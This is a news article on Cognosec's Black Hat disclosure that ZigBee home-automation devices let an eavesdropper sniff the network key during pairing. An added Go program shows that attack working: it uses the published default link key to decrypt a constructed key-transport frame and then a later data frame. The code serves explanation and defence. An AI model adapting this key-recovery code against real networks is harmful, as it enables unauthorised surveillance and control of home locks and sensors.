Cognosec reports ‘critical security flaws’ affecting ZigBee-connected IoT devices

Tobias Zillner, senior IS
auditor at Cognosec in Vienna

International IT security company Cognosec has revealed critical security flaws in ZigBee, one of the most widely used wireless communication standards for Internet of Things (IoT) devices.

Speaking at Black Hat USA in Las Vegas, Nevada, Cognosec outlined the main security risks in ZigBee implementations and the devices affected, and demonstrated practical exploitation of vulnerabilities in actual products.

A white paper explaining how the ZigBee standard can be exploited is available at http://cognosec.com/zigbee_exploited_8F_Ca9.pdf. Key details include:

  • The ZigBee standard requires that an insecure initial key transport be supported; according to Cognosec, this makes it possible to compromise ZigBee networks and take control of every device connected to them
  • Manufacturers using the ZigBee standard include Samsung, Philips, Motorola, Texas Instruments and many others
  • Devices on a home automation network may include security systems such as door locks and motion sensors, as well as heating, ventilation and air-conditioning (HVAC) systems and smart light bulbs/switches.

Commonly found in smart homes, the ZigBee standard was created to enable secure wireless communication between IoT devices. However, low per-unit costs, interoperability and compatibility requirements, and the application of legacy security concepts have led to the persistence of known security risks.

Having conducted numerous real-world assessments of the identified vulnerabilities, Cognosec found that it is possible to compromise ZigBee networks and take control of every device on them. The practical security analysis of each device assessed showed that the solutions are designed for easy setup and use but offer no security configuration options, and that their device pairing procedure allows an external party to sniff the network key as it is exchanged. This is a critical vulnerability, because the security of the whole solution rests solely on the secrecy of that network key.

Tests with light bulbs, motion sensors, temperature sensors and even door locks also showed that the vendors of the tested devices implemented only the minimum of features required for certification. No further options to raise the level of security were implemented or made available to the end user.

One use case highlighted in the white paper and presentation was external parties gaining control of home automation systems, which have high privacy requirements and are a huge source of personal data. Communication between devices on a ZigBee network is governed by application profiles. The ZigBee home automation profile lets a defined set of device types exchange control messages to form a wireless home automation application. These devices exchange well-known messages to effect control, such as turning a lamp on or off, sending a light-sensor reading to a lighting controller, or sending an alert if an occupancy sensor detects movement.

If a manufacturer wants a device to be compatible with certified devices from other manufacturers, it has to implement the standard interfaces and practices of this profile. However, the profile's use of a default link key puts the secrecy of the network key at high risk. Because ZigBee's security relies on the secrecy of the key material, and therefore on the secure initialisation and transport of the encryption keys, this default fallback mechanism has to be considered a critical risk. If an attacker can sniff a joining device, or can join the network using the default link key, the active network key is compromised and the confidentiality of all network communication must be considered compromised.
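To make that dependency concrete, here is an added example in Go (not code from Cognosec or its white paper) that models the pairing exchange: the Trust Center delivers the network key to a joining device in an APS Transport-Key command protected with the link key; an eavesdropper who holds the default link key decrypts that command, recovers the network key, and from then on can decrypt the network-layer traffic protected with it. The AES-CCM* construction (13-byte nonce of source address, frame counter and security control byte; 4-byte MIC for security level 5) follows the mode ZigBee uses, but everything else is assumed or simplified: the header bytes, addresses and payloads are constructed; the real command is protected with a key-transport key derived from the link key by a keyed hash, which is skipped here because anyone holding the default key can derive it; and the default key value used is the published ZigBee Alliance default Trust Center link key, which this article does not itself name.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/subtle"
	"encoding/binary"
	"errors"
	"fmt"
)

// ZigBee security level 5 (ENC-MIC-32): AES-128 CCM* with a 4-byte MIC.
const micLen = 4

// defaultTCLinkKey is the published ZigBee Alliance default Trust Center link
// key; it stands in here for the "default link key" the article refers to.
var defaultTCLinkKey = []byte("ZigBeeAlliance09")

// frame is what an eavesdropper captures: cleartext header (authenticated but
// not encrypted), the nonce fields, and ciphertext||MIC. Header bytes below
// are constructed stand-ins; real NWK/APS header parsing is out of scope.
type frame struct {
	header  []byte
	srcAddr uint64 // extended (IEEE) address of the sender
	counter uint32 // frame counter from the auxiliary security header
	secCtrl byte   // security control byte (level, key id, ext nonce flag)
	body    []byte // ciphertext || MIC
}

// nonce builds the 13-byte CCM* nonce ZigBee uses.
func (f frame) nonce() []byte {
	n := make([]byte, 13)
	binary.LittleEndian.PutUint64(n[0:8], f.srcAddr)
	binary.LittleEndian.PutUint32(n[8:12], f.counter)
	n[12] = f.secCtrl
	return n
}

// cbcMAC computes the CCM* tag: B0, then the 2-byte-length-prefixed header
// as associated data, then the plaintext, each zero-padded to 16 bytes.
func cbcMAC(blk cipher.Block, nonce, aad, pt []byte) []byte {
	x := make([]byte, 16)
	x[0] = 0x49 // flags: Adata=1, (M-2)/2=1 for M=4, L-1=1
	copy(x[1:14], nonce)
	binary.BigEndian.PutUint16(x[14:], uint16(len(pt)))
	blk.Encrypt(x, x)
	la := append([]byte{byte(len(aad) >> 8), byte(len(aad))}, aad...)
	for _, b := range [][]byte{la, pt} {
		for i := 0; i < len(b); i += 16 {
			for j := 0; j < 16 && i+j < len(b); j++ {
				x[j] ^= b[i+j] // missing bytes are the zero padding
			}
			blk.Encrypt(x, x)
		}
	}
	return x[:micLen]
}

// ctr XORs in with the counter keystream E(A_1), E(A_2), ... and also returns
// S_0 = E(A_0), which CCM* uses to mask the MIC.
func ctr(blk cipher.Block, nonce, in []byte) ([]byte, []byte) {
	a := make([]byte, 16)
	a[0] = 0x01 // flags: L-1
	copy(a[1:14], nonce)
	s := make([]byte, 16)
	blk.Encrypt(s, a)
	s0 := append([]byte{}, s[:micLen]...)
	out := make([]byte, len(in))
	for i := 0; i < len(in); i += 16 {
		binary.BigEndian.PutUint16(a[14:], uint16(i/16+1))
		blk.Encrypt(s, a)
		for j := 0; j < 16 && i+j < len(in); j++ {
			out[i+j] = in[i+j] ^ s[j]
		}
	}
	return out, s0
}

// seal is the sender side: returns ciphertext||MIC for pt under key.
func seal(key []byte, f frame, pt []byte) ([]byte, error) {
	blk, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	ct, s0 := ctr(blk, f.nonce(), pt)
	tag := cbcMAC(blk, f.nonce(), f.header, pt)
	for i := range tag {
		tag[i] ^= s0[i]
	}
	return append(ct, tag...), nil
}

// open is what a receiver, or an eavesdropper holding the key, does: decrypt
// and verify the MIC. Any other key fails the MIC check.
func open(key []byte, f frame) ([]byte, error) {
	blk, err := aes.NewCipher(key)
	if err != nil || len(f.body) < micLen {
		return nil, errors.New("bad key length or truncated frame")
	}
	ct, u := f.body[:len(f.body)-micLen], f.body[len(f.body)-micLen:]
	pt, s0 := ctr(blk, f.nonce(), ct)
	tag := cbcMAC(blk, f.nonce(), f.header, pt)
	for i := range tag {
		tag[i] ^= s0[i]
	}
	if subtle.ConstantTimeCompare(tag, u) != 1 {
		return nil, errors.New("MIC mismatch: wrong key or tampered frame")
	}
	return pt, nil
}

// buildCapture constructs the two frames sniffed during and after pairing:
// the APS Transport-Key command (0x05, key type 0x01 = standard network key)
// protected with the link key, and a later NWK data frame protected with the
// network key it carried. Keys, addresses and header bytes are constructed.
func buildCapture(linkKey []byte) (transport, data frame, nwkKey []byte) {
	nwkKey = []byte("constructed-nwk!") // 16-byte stand-in for a random network key
	tc, bulb := uint64(0x00124B0001020304), uint64(0x00178801AABBCCDD)
	transport = frame{header: []byte{0x48, 0x02, 0x00, 0x00, 0x01, 0x00}, srcAddr: tc, counter: 1, secCtrl: 0x25}
	transport.body, _ = seal(linkKey, transport, append([]byte{0x05, 0x01}, nwkKey...))
	data = frame{header: []byte{0x48, 0x02, 0x01, 0x00, 0x00, 0x00}, srcAddr: bulb, counter: 7, secCtrl: 0x2D}
	data.body, _ = seal(nwkKey, data, []byte("ZCL On/Off cluster: ON"))
	return
}

// recoverNetworkKey is the attack the article describes: decrypt the sniffed
// Transport-Key command with the default link key and read out the network key.
func recoverNetworkKey(linkKey []byte, transport frame) ([]byte, error) {
	pt, err := open(linkKey, transport)
	if err != nil {
		return nil, err
	}
	if len(pt) != 18 || pt[0] != 0x05 || pt[1] != 0x01 {
		return nil, errors.New("not a standard network key transport")
	}
	return pt[2:], nil
}

func main() {
	transport, data, _ := buildCapture(defaultTCLinkKey)
	nwk, err := recoverNetworkKey(defaultTCLinkKey, transport)
	if err != nil {
		panic(err)
	}
	fmt.Printf("recovered network key: %q\n", nwk)
	pt, err := open(nwk, data)
	fmt.Printf("decrypted NWK payload: %q (err=%v)\n", pt, err)
	_, err = recoverNetworkKey([]byte("0123456789abcdef"), transport)
	fmt.Println("with a non-default link key:", err)
}
```

The last line of the output is the point: once the link key is something other than the well-known default, the eavesdropper's attempt fails the MIC check and the network key never leaves the Transport-Key command. That is the protection a per-device link key installed out of band would give, and it is the configuration option the tested devices did not offer.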

“The shortfalls and limitations we have discovered in ZigBee have been created by the manufacturers,” said Tobias Zillner at Cognosec. “Companies want to create the latest and greatest products, which today means they are likely to be internet connected. Simple units such as light switches have to be compatible with a whole host of other devices and, unsurprisingly, little consideration is made to security requirements – most likely to keep costs down. Unfortunately, the security risk in this last-tier wireless communication standard can therefore be considered as very high.”

 
